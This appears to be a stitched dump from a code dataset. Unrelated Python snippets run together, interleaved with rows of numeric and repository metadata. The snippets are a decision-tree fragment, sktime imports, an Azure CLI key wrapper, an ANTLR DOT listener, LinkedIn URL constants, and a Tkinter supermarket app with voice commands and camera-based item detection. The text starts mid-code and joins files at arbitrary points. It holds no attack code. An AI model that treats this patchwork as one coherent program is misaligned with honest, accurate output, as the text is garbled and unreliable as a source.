# {"feature": "Children", "instances": 5, "metric_value": 0.3, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[12]>1:
# {"feature": "Children", "instances": 8, "metric_value": 0.3571, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 7, "metric_value": 0.4048, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[0]>2:
return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.3333, "depth": 8}
if obj[0]<=1:
# {"feature": "Time", "instances": 6, "metric_value": 0.2222, "depth": 9}
if obj[1]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[11]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[11]<=0:
return 'False'
else: return 'False'
elif obj[1]>1:
return 'True'
else: return 'True'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'True'
elif obj[9]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
| 42.001066
| 262
| 0.462958
| 36,928
| 315,260
| 3.896637
| 0.024209
| 0.128962
| 0.140686
| 0.126203
| 0.971173
| 0.929838
| 0.92302
| 0.853365
| 0.79688
| 0.734487
| 0
| 0.103556
| 0.356725
| 315,260
| 7,505
| 263
| 42.006662
| 0.605989
| 0.417547
| 0
| 0.99175
| 0
| 0
| 0.071267
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000172
| false
| 0
| 0
| 0
| 0.21021
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
814d68783a98126a48a7084913eabb89c98ae4d1
| 170
|
py
|
Python
|
sktime/datasets/__init__.py
|
TonyBagnall/sktime
|
837a77026be3e53511c3d6139ddad14a39351bf5
|
[
"BSD-3-Clause"
] | 2
|
2019-08-19T13:59:21.000Z
|
2020-03-02T20:32:31.000Z
|
sktime/datasets/__init__.py
|
TonyBagnall/boss_fork
|
837a77026be3e53511c3d6139ddad14a39351bf5
|
[
"BSD-3-Clause"
] | null | null | null |
sktime/datasets/__init__.py
|
TonyBagnall/boss_fork
|
837a77026be3e53511c3d6139ddad14a39351bf5
|
[
"BSD-3-Clause"
] | 2
|
2019-08-24T12:06:15.000Z
|
2020-01-09T07:32:40.000Z
|
from .base import load_gunpoint
from .base import load_gunpoint_dataframe
from .base import load_italy_power_demand_dataframe
from .base import load_arrow_head_dataframe
| 34
| 51
| 0.882353
| 26
| 170
| 5.384615
| 0.423077
| 0.228571
| 0.4
| 0.514286
| 0.757143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094118
| 170
| 4
| 52
| 42.5
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
81cdc4a5bc02a6b2f28bbac4651c27cb31e77850
| 267
|
py
|
Python
|
simulator/scripts/sweep/sec_size_sweep.py
|
lab11/Task2
|
3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6
|
[
"Apache-2.0"
] | 21
|
2018-08-29T18:58:26.000Z
|
2022-01-12T09:08:04.000Z
|
simulator/scripts/sweep/sec_size_sweep.py
|
lab11/permamote
|
3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6
|
[
"Apache-2.0"
] | 9
|
2017-11-08T03:22:58.000Z
|
2020-05-02T18:23:12.000Z
|
simulator/scripts/sweep/sec_size_sweep.py
|
lab11/Task2
|
3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6
|
[
"Apache-2.0"
] | 8
|
2018-10-28T23:44:23.000Z
|
2021-07-11T05:18:02.000Z
|
class sweep:
def __init__(self):
self.sweep_vars = [[('secondary', 'capacity_J'), [i*10**exp for exp in range(-3, 3) for i in [1, 5]], 'util']]
#class sweep:
# def __init__(self):
# self.sweep_vars = [[('secondary', 'capacity_J'), [1], 'util']]
| 38.142857
| 118
| 0.576779
| 39
| 267
| 3.641026
| 0.487179
| 0.140845
| 0.183099
| 0.239437
| 0.732394
| 0.732394
| 0.732394
| 0.732394
| 0.732394
| 0.732394
| 0
| 0.032864
| 0.202247
| 267
| 6
| 119
| 44.5
| 0.633803
| 0.393258
| 0
| 0
| 0
| 0
| 0.144654
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c49c3bb9c49eecb1eda74ddecae4cdade78a0a23
| 2,538
|
py
|
Python
|
pyaz/postgres/server/key/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/postgres/server/key/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/postgres/server/key/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
'''
Manage PostgreSQL server keys.
'''
from .... pyaz_utils import _call_az
def create(kid, name, resource_group):
'''
Create server key.
Required Parameters:
- kid -- The Azure Key Vault key identifier of the server key. An example key identifier is "https://YourVaultName.vault.azure.net/keys/YourKeyName/01234567890123456789012345678901"
- name -- Name of the server. The name can contain only lowercase letters, numbers, and the hyphen (-) character. Minimum 3 characters and maximum 63 characters.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az postgres server key create", locals())
def delete(kid, name, resource_group, yes=None):
'''
Delete server key.
Required Parameters:
- kid -- The Azure Key Vault key identifier of the server key. An example key identifier is "https://YourVaultName.vault.azure.net/keys/YourKeyName/01234567890123456789012345678901"
- name -- Name of the server. The name can contain only lowercase letters, numbers, and the hyphen (-) character. Minimum 3 characters and maximum 63 characters.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- yes -- Do not prompt for confirmation.
'''
return _call_az("az postgres server key delete", locals())
def show(kid, name, resource_group):
'''
Show server key.
Required Parameters:
- kid -- The Azure Key Vault key identifier of the server key. An example key identifier is "https://YourVaultName.vault.azure.net/keys/YourKeyName/01234567890123456789012345678901"
- name -- Name of the server. The name can contain only lowercase letters, numbers, and the hyphen (-) character. Minimum 3 characters and maximum 63 characters.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az postgres server key show", locals())
def list(name, resource_group):
'''
Required Parameters:
- name -- Name of the server. The name can contain only lowercase letters, numbers, and the hyphen (-) character. Minimum 3 characters and maximum 63 characters.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az postgres server key list", locals())
| 46.145455
| 185
| 0.723404
| 336
| 2,538
| 5.407738
| 0.193452
| 0.085856
| 0.042378
| 0.028619
| 0.839296
| 0.839296
| 0.839296
| 0.822234
| 0.822234
| 0.822234
| 0
| 0.0523
| 0.186367
| 2,538
| 54
| 186
| 47
| 0.827603
| 0.760047
| 0
| 0
| 0
| 0
| 0.238298
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0
| 0.111111
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
c4ea2b3280d909e2e67c0135ca2475df32ad58ba
| 4,100
|
py
|
Python
|
DOTListener.py
|
Makistos/dotcomb
|
aa90d8bcfd18b49942fccfd2d45eddab28f6e61a
|
[
"MIT"
] | null | null | null |
DOTListener.py
|
Makistos/dotcomb
|
aa90d8bcfd18b49942fccfd2d45eddab28f6e61a
|
[
"MIT"
] | null | null | null |
DOTListener.py
|
Makistos/dotcomb
|
aa90d8bcfd18b49942fccfd2d45eddab28f6e61a
|
[
"MIT"
] | null | null | null |
# Generated from DOT.g4 by ANTLR 4.7.1
from antlr4 import *
if __name__ is not None and "." in __name__:
from .DOTParser import DOTParser
else:
from DOTParser import DOTParser
# This class defines a complete listener for a parse tree produced by DOTParser.
class DOTListener(ParseTreeListener):
# Enter a parse tree produced by DOTParser#graph.
def enterGraph(self, ctx:DOTParser.GraphContext):
pass
# Exit a parse tree produced by DOTParser#graph.
def exitGraph(self, ctx:DOTParser.GraphContext):
pass
# Enter a parse tree produced by DOTParser#stmt_list.
def enterStmt_list(self, ctx:DOTParser.Stmt_listContext):
pass
# Exit a parse tree produced by DOTParser#stmt_list.
def exitStmt_list(self, ctx:DOTParser.Stmt_listContext):
pass
# Enter a parse tree produced by DOTParser#stmt.
def enterStmt(self, ctx:DOTParser.StmtContext):
pass
# Exit a parse tree produced by DOTParser#stmt.
def exitStmt(self, ctx:DOTParser.StmtContext):
pass
# Enter a parse tree produced by DOTParser#attr_stmt.
def enterAttr_stmt(self, ctx:DOTParser.Attr_stmtContext):
pass
# Exit a parse tree produced by DOTParser#attr_stmt.
def exitAttr_stmt(self, ctx:DOTParser.Attr_stmtContext):
pass
# Enter a parse tree produced by DOTParser#attr_list.
def enterAttr_list(self, ctx:DOTParser.Attr_listContext):
pass
# Exit a parse tree produced by DOTParser#attr_list.
def exitAttr_list(self, ctx:DOTParser.Attr_listContext):
pass
# Enter a parse tree produced by DOTParser#a_list.
def enterA_list(self, ctx:DOTParser.A_listContext):
pass
# Exit a parse tree produced by DOTParser#a_list.
def exitA_list(self, ctx:DOTParser.A_listContext):
pass
# Enter a parse tree produced by DOTParser#edge_stmt.
def enterEdge_stmt(self, ctx:DOTParser.Edge_stmtContext):
pass
# Exit a parse tree produced by DOTParser#edge_stmt.
def exitEdge_stmt(self, ctx:DOTParser.Edge_stmtContext):
pass
# Enter a parse tree produced by DOTParser#edgeRHS.
def enterEdgeRHS(self, ctx:DOTParser.EdgeRHSContext):
pass
# Exit a parse tree produced by DOTParser#edgeRHS.
def exitEdgeRHS(self, ctx:DOTParser.EdgeRHSContext):
pass
# Enter a parse tree produced by DOTParser#edgeop.
def enterEdgeop(self, ctx:DOTParser.EdgeopContext):
pass
# Exit a parse tree produced by DOTParser#edgeop.
def exitEdgeop(self, ctx:DOTParser.EdgeopContext):
pass
# Enter a parse tree produced by DOTParser#node_stmt.
def enterNode_stmt(self, ctx:DOTParser.Node_stmtContext):
pass
# Exit a parse tree produced by DOTParser#node_stmt.
def exitNode_stmt(self, ctx:DOTParser.Node_stmtContext):
pass
# Enter a parse tree produced by DOTParser#node_id.
def enterNode_id(self, ctx:DOTParser.Node_idContext):
pass
# Exit a parse tree produced by DOTParser#node_id.
def exitNode_id(self, ctx:DOTParser.Node_idContext):
pass
# Enter a parse tree produced by DOTParser#port.
def enterPort(self, ctx:DOTParser.PortContext):
pass
# Exit a parse tree produced by DOTParser#port.
def exitPort(self, ctx:DOTParser.PortContext):
pass
# Enter a parse tree produced by DOTParser#subgraph.
def enterSubgraph(self, ctx:DOTParser.SubgraphContext):
pass
# Exit a parse tree produced by DOTParser#subgraph.
def exitSubgraph(self, ctx:DOTParser.SubgraphContext):
pass
# Enter a parse tree produced by DOTParser#r_id.
def enterR_id(self, ctx:DOTParser.R_idContext):
pass
# Exit a parse tree produced by DOTParser#r_id.
def exitR_id(self, ctx:DOTParser.R_idContext):
pass
# Enter a parse tree produced by DOTParser#v_id.
def enterV_id(self, ctx:DOTParser.V_idContext):
pass
# Exit a parse tree produced by DOTParser#v_id.
def exitV_id(self, ctx:DOTParser.V_idContext):
pass
| 28.082192
| 80
| 0.700976
| 549
| 4,100
| 5.12204
| 0.151184
| 0.066145
| 0.110242
| 0.198435
| 0.838549
| 0.72404
| 0.713727
| 0.564367
| 0.423898
| 0.037696
| 0
| 0.001582
| 0.229268
| 4,100
| 145
| 81
| 28.275862
| 0.888291
| 0.380488
| 0
| 0.454545
| 1
| 0
| 0.000404
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.454545
| false
| 0.454545
| 0.045455
| 0
| 0.515152
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
480a482bbcd521000a3f7930ffb20e8da8813657
| 138
|
py
|
Python
|
linkedin_jobs_scraper/utils/constants.py
|
magahet/py-linkedin-jobs-scraper
|
f0d69053455e68bd8a74ab2d79ab2c27b5e3f7d4
|
[
"MIT"
] | 85
|
2020-10-21T04:09:23.000Z
|
2022-03-23T00:29:33.000Z
|
linkedin_jobs_scraper/utils/constants.py
|
magahet/py-linkedin-jobs-scraper
|
f0d69053455e68bd8a74ab2d79ab2c27b5e3f7d4
|
[
"MIT"
] | 24
|
2020-11-18T10:10:32.000Z
|
2022-03-19T17:30:25.000Z
|
linkedin_jobs_scraper/utils/constants.py
|
magahet/py-linkedin-jobs-scraper
|
f0d69053455e68bd8a74ab2d79ab2c27b5e3f7d4
|
[
"MIT"
] | 23
|
2020-11-18T09:31:13.000Z
|
2022-03-25T03:50:52.000Z
|
HOME_URL = 'https://www.linkedin.com'
JOBS_URL = 'https://www.linkedin.com/jobs'
JOBS_SEARCH_URL = 'https://www.linkedin.com/jobs/search'
| 34.5
| 56
| 0.73913
| 22
| 138
| 4.454545
| 0.363636
| 0.244898
| 0.336735
| 0.581633
| 0.795918
| 0.795918
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 138
| 3
| 57
| 46
| 0.75969
| 0
| 0
| 0
| 0
| 0
| 0.644928
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fe4b8814f8055cb48856868fba0b87c900e6a59
| 48,870
|
py
|
Python
|
src/interface.py
|
sugaarrrr/intelligent-supermarket-system
|
e8e570f53cc2df4da3f68b2de185bb5ed521b843
|
[
"MIT"
] | null | null | null |
src/interface.py
|
sugaarrrr/intelligent-supermarket-system
|
e8e570f53cc2df4da3f68b2de185bb5ed521b843
|
[
"MIT"
] | 1
|
2021-10-12T05:47:50.000Z
|
2021-10-12T05:47:50.000Z
|
src/interface.py
|
sugaarrrr/intelligent-supermarket-system
|
e8e570f53cc2df4da3f68b2de185bb5ed521b843
|
[
"MIT"
] | null | null | null |
#import libraries
from datetime import datetime
import time
import tkinter as tk
import tkinter.scrolledtext as scrtxt
from tkinter import *
import tkinter.font as font
from PIL import Image, ImageTk
from tkinter import ttk
import speech_recognition as sr
from gtts import gTTS
from imutils.video.pivideostream import PiVideoStream
from imutils.video import FPS
import imutils
import time
import cv2
font_name = "Gentium"
classNames = {0: 'background',
1: 'person', 2: 'bicycle', 3: 'car', 4: 'motorcycle', 5: 'airplane', 6: 'bus',
7: 'train', 8: 'truck', 9: 'boat', 10: 'traffic light', 11: 'fire hydrant',
13: 'stop sign', 14: 'parking meter', 15: 'bench', 16: 'bird', 17: 'cat',
18: 'dog', 19: 'horse', 20: 'sheep', 21: 'cow', 22: 'elephant', 23: 'bear',
24: 'zebra', 25: 'giraffe', 27: 'backpack', 28: 'umbrella', 31: 'handbag',
32: 'tie', 33: 'suitcase', 34: 'frisbee', 35: 'skis', 36: 'snowboard',
37: 'sports ball', 38: 'kite', 39: 'baseball bat', 40: 'baseball glove',
41: 'skateboard', 42: 'surfboard', 43: 'tennis racket', 44: 'bottle',
46: 'wine glass', 47: 'cup', 48: 'fork', 49: 'knife', 50: 'spoon',
51: 'bowl', 52: 'banana', 53: 'apple', 54: 'sandwich', 55: 'orange',
56: 'broccoli', 57: 'carrot', 58: 'hot dog', 59: 'pizza', 60: 'donut',
61: 'cake', 62: 'chair', 63: 'couch', 64: 'potted plant', 65: 'bed',
67: 'dining table', 70: 'toilet', 72: 'tv', 73: 'laptop', 74: 'mouse',
75: 'remote', 76: 'keyboard', 77: 'cell phone', 78: 'microwave', 79: 'oven',
80: 'toaster', 81: 'sink', 82: 'refrigerator', 84: 'book', 85: 'clock',
86: 'vase', 87: 'scissors', 88: 'teddy bear', 89: 'hair drier', 90: 'toothbrush'}
#classNames = {0:'banana', 1:'apple', 2:'orange', '3': 'scissors', 4:'background'}
desired = ['background','banana','apple','scissors','book', 'remote', 'hair drier','bottle']
def id_class_name(class_id, classes):
for key, value in classes.items():
if class_id == key:
return value
model = cv2.dnn.readNetFromTensorflow('models/frozen_inference_graph.pb','models/ssd_mobilenet_v2_coco_2018_03_29.pbtxt')
#----------------Scanner-------------------------
class Scanner():
def __init__(self, cust):
self.customer = cust
self.grocery_list = []
def add_item(self, item_name, price, quantity):
if self.item_exists(item_name) == True:
for entry in self.grocery_list:
if entry['item'] == item_name:
entry['quantity'] += quantity
else:
entry = {'item':item_name, 'price':price, 'quantity':quantity}
self.grocery_list.append(entry)
#print(self.grocery_list)
def item_exists(self, item_name): #check if the item is available in the list
available = False
for entry in self.grocery_list:
if entry['item'] == item_name:
available = True
return available
def delete_item(self, item_name):
for entry in self.grocery_list:
if entry['item'] == item_name:
self.grocery_list.remove(entry)
#print(self.grocery_list)
def receipt(self):
return self.grocery_list
#---------------Voice command------------------
def voice_input():
    """Listen for one utterance and map it to a known store category.

    Returns:
        The lowercased category name if it is one of the known sections,
        "not found" if speech was recognized but is not a category,
        "inaudible" if the speech could not be understood, or
        "error" if the recognition service failed.
    """
    # Closed set of valid section names; replaces the original 9-branch
    # elif chain that called text.lower() on every comparison.
    categories = {"bakery", "dairy", "deli", "dry goods", "health and beauty",
                  "hygiene", "meat", "produce", "seafood"}
    r = sr.Recognizer()
    with sr.Microphone() as source:
        r.adjust_for_ambient_noise(source, duration=1)  # 1s calibration
        audio = r.listen(source)
    try:
        text = r.recognize_google(audio).lower()
    except sr.UnknownValueError:
        return "inaudible"
    except sr.RequestError:
        return "error"
    return text if text in categories else "not found"
#----------------Interface-----------------------
# Demo customer with a pre-seeded cart (same items, same insertion order).
nao = Scanner('nao')
for _item, _price, _qty in (('Banana', 15, 10), ('Apple', 30, 2),
                            ('Celery', 10, 5), ('Garlic', 15, 5),
                            ('Salt', 75, 1), ('Pepper', 85, 1)):
    nao.add_item(_item, _price, _qty)
class MainApp(tk.Tk):
    """Root window: stacks all screen frames in one grid cell and raises one at a time."""

    def __init__(self, *args, **kwargs):
        tk.Tk.__init__(self, *args, **kwargs)
        container = tk.Frame(self)
        container.pack(side="top", fill="both", expand=True)
        container.grid_rowconfigure(0, weight=1)
        container.grid_columnconfigure(0, weight=1)
        pages = (Opening, ShoppingCart, Navigation, Bakery, Dairy, Deli,
                 Dry_goods, Health_beauty, Hygiene, Meat, Produce, Seafood,
                 Checkout)
        self.frames = {}
        for page_cls in pages:
            page = page_cls(container, self)
            page.grid(row=0, column=0, sticky="nsew")
            self.frames[page_cls] = page
        self.show_frame(Opening)

    def show_frame(self, cont):
        """Raise the frame registered under the given page class."""
        self.frames[cont].tkraise()
class Opening(tk.Frame):
    """Landing screen: welcome title, the three main action buttons, and the app icon."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        title = tk.Label(self, text="Welcome to mBot Market!", font=(font_name, 15, 'bold'))
        title.place(relx=0.5, rely=0.1, anchor='center')
        # (text, horizontal position, destination frame class)
        actions = (("Shopping cart", 0.2, ShoppingCart),
                   ("Navigation", 0.5, Navigation),
                   ("Check out", 0.8, Checkout))
        for text, relx, target in actions:
            # target=target binds the value now, avoiding the late-binding
            # closure pitfall inside the loop.
            btn = tk.Button(self, text=text, font=(font_name, 10), width=15, height=2,
                            command=lambda target=target: controller.show_frame(target))
            btn.place(relx=relx, rely=0.25, anchor='center')
        icon = ImageTk.PhotoImage(Image.open("main_icon.png"))
        picture = tk.Label(self, image=icon)
        picture.place(relx=0.5, rely=0.65, anchor='center')
        picture.image = icon  # keep a reference so Tk does not garbage-collect the photo
class ShoppingCart(tk.Frame):
    """Cart screen: lists nao's grocery list and adds items via camera detection."""
    def __init__(self, parent, controller):
        tk.Frame.__init__(self,parent)
        label = tk.Label(self, text="Your Shopping Cart", font=(font_name, 12, 'bold'))
        label.place(relx = 0.5, rely = 0.075, anchor = 'center')
        self.build_tree()
        button = tk.Button(self, text="Add Item", font=(font_name, 10), width=20, height=1, command=lambda: self.add_item(controller))
        button.place(relx = 0.31, rely = 0.9, anchor = 'center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=20, height=1, command=lambda: controller.show_frame(Opening))
        button.place(relx = 0.69, rely = 0.9, anchor = 'center')
    def build_tree(self):
        """Render the global cart (nao.receipt()) into a 4-column Treeview."""
        shopping_list = nao.receipt()
        cols = ('No.', 'Item', 'Qty.', 'Price')
        table = ttk.Treeview(self, columns = cols, show = 'headings', height=15)
        table.place(relx = 0.5, rely = 0.125, anchor = 'n')
        # NOTE(review): a brand-new Treeview is created on every call, so this
        # clearing loop only ever sees an empty widget; old tables are merely
        # covered by the new one placed on top — confirm intent.
        for i in table.get_children():
            table.delete(i)
        table.column(cols[0], width = 30, anchor = 'center')
        table.column(cols[1], width = 250, anchor = 'w')
        table.column(cols[2], width = 30, anchor = 'center')
        table.column(cols[3], width = 40, anchor = 'center')
        table.heading(cols[0], text = cols[0])
        table.heading(cols[1], text = cols[1], anchor = 'w')
        table.heading(cols[2], text = cols[2])
        table.heading(cols[3], text = cols[3])
        for i in range(len(shopping_list)):
            table.insert("", "end", values=(i+1, shopping_list[i]['item'], shopping_list[i]['quantity'], shopping_list[i]['price']))
    def add_item(self, controller):  # EDIT HERE to change how items are added
        """Stream Pi-camera frames through SSD MobileNet until a whitelisted
        (`desired`) object is detected with confidence > 0.5, then add it to
        the cart with a flat price of 100 and quantity 1."""
        # (original note: open the camera; adding via a popup would also work)
        vs = PiVideoStream().start()
        time.sleep(2.0)  # camera warm-up
        while True:
            image = vs.read()
            #print(image);print(image.shape)
            print('reading...')
            image_height, image_width, _= image.shape
            # SSD MobileNet expects 300x300 RGB input (OpenCV frames are BGR, hence swapRB).
            model.setInput(cv2.dnn.blobFromImage(image, size=(300, 300), swapRB=True))
            output = model.forward()
            added = False
            for detection in output[0, 0, :, :]:
                confidence = detection[2]
                if confidence > .5:
                    class_id = detection[1]
                    class_name=id_class_name(class_id,classNames)
                    # NOTE(review): `break` abandons the frame's remaining
                    # detections on the first non-whitelisted class —
                    # `continue` may have been intended; confirm.
                    if class_name not in desired:
                        break
                    else:
                        print(class_name,'found! Adding to cart...')
                        nao.add_item(class_name,100,1)
                        added = True
            cv2.imshow('image',image)
            # NOTE(review): no cv2.waitKey() after imshow — the preview window
            # likely never repaints; confirm on the target device.
            if added:
                cv2.destroyAllWindows()
                vs.stop()
                break
        self.build_tree()
        controller.show_frame(ShoppingCart)
class Navigation(tk.Frame):
    """Navigation hub screen: store-map image plus voice-driven section jumps."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
        label.place(relx=0.5, rely=0.075, anchor='center')
        icon = Image.open("decorations/Base.jpg")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10; use Image.LANCZOS there.
        icon = icon.resize((467, 240), Image.ANTIALIAS)
        icon = ImageTk.PhotoImage(icon)
        label = tk.Label(self, image=icon)
        label.place(relx=0.5, rely=0.38, anchor='center')
        label.image = icon  # keep a reference so Tk does not garbage-collect the photo
        button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1,
                           command=lambda: self.goto(controller))
        button.place(relx=0.26, rely=0.7, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.74, rely=0.7, anchor='center')

    def goto(self, controller):
        """Take one voice command and raise the matching section screen.

        Fix: the original shadowed the `input` builtin, re-called .lower()
        in a 12-branch elif chain, and duplicated the popup code three times;
        replaced with dispatch tables and a single popup helper.
        """
        spoken = voice_input().lower()
        sections = {"bakery": Bakery, "dairy": Dairy, "deli": Deli,
                    "dry goods": Dry_goods, "health and beauty": Health_beauty,
                    "hygiene": Hygiene, "meat": Meat, "produce": Produce,
                    "seafood": Seafood}
        messages = {"not found": "Sorry, category not found :(",
                    "inaudible": "Sorry, inaudible voice. Please try again",
                    "error": "Sorry, service is unavailable"}
        if spoken in sections:
            controller.show_frame(sections[spoken])
        elif spoken in messages:
            self._popup(controller, messages[spoken])

    def _popup(self, controller, message):
        """Open a small error window whose Okay button returns to Navigation."""
        popup = tk.Tk()
        popup.wm_title("Sorry!")
        popup.geometry("275x100")
        label = ttk.Label(popup, text=message, font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Close the popup and show the Navigation screen again."""
        popup.destroy()
        controller.show_frame(Navigation)
class Bakery(tk.Frame):
    """Bakery section screen: section photo plus voice-driven section jumps."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
        label.place(relx=0.5, rely=0.075, anchor='center')
        icon = Image.open("decorations/Bakery.jpg")
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10; use Image.LANCZOS there.
        icon = icon.resize((467, 240), Image.ANTIALIAS)
        icon = ImageTk.PhotoImage(icon)
        label = tk.Label(self, image=icon)
        label.place(relx=0.5, rely=0.38, anchor='center')
        label.image = icon  # keep a reference so Tk does not garbage-collect the photo
        button = tk.Button(self, text="Voice Command", font=(font_name, 10), width=26, height=1,
                           command=lambda: self.goto(controller))
        button.place(relx=0.26, rely=0.7, anchor='center')
        button = tk.Button(self, text="Return", font=(font_name, 10), width=26, height=1,
                           command=lambda: controller.show_frame(Opening))
        button.place(relx=0.74, rely=0.7, anchor='center')

    def goto(self, controller):
        """Take one voice command and raise the matching section screen.

        Fix: the original shadowed the `input` builtin, re-called .lower()
        in a 12-branch elif chain, and duplicated the popup code three times;
        replaced with dispatch tables and a single popup helper.
        """
        spoken = voice_input().lower()
        sections = {"bakery": Bakery, "dairy": Dairy, "deli": Deli,
                    "dry goods": Dry_goods, "health and beauty": Health_beauty,
                    "hygiene": Hygiene, "meat": Meat, "produce": Produce,
                    "seafood": Seafood}
        messages = {"not found": "Sorry, category not found :(",
                    "inaudible": "Sorry, inaudible voice. Please try again",
                    "error": "Sorry, service is unavailable"}
        if spoken in sections:
            controller.show_frame(sections[spoken])
        elif spoken in messages:
            self._popup(controller, messages[spoken])

    def _popup(self, controller, message):
        """Open a small error window whose Okay button returns to Navigation."""
        popup = tk.Tk()
        popup.wm_title("Sorry!")
        popup.geometry("275x100")
        label = ttk.Label(popup, text=message, font=(font_name, 10))
        label.place(relx=0.5, rely=0.3, anchor='center')
        button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1,
                           command=lambda: self.finish(controller, popup))
        button.place(relx=0.5, rely=0.7, anchor='center')

    def finish(self, controller, popup):
        """Close the popup and return to the Navigation screen."""
        popup.destroy()
        controller.show_frame(Navigation)
class Dairy(tk.Frame):
    """Dairy section screen: section photo plus voice-driven section jumps."""

    def __init__(self, parent, controller):
        tk.Frame.__init__(self, parent)
        label = tk.Label(self, text="What are you looking for?", font=(font_name, 12, 'bold'))
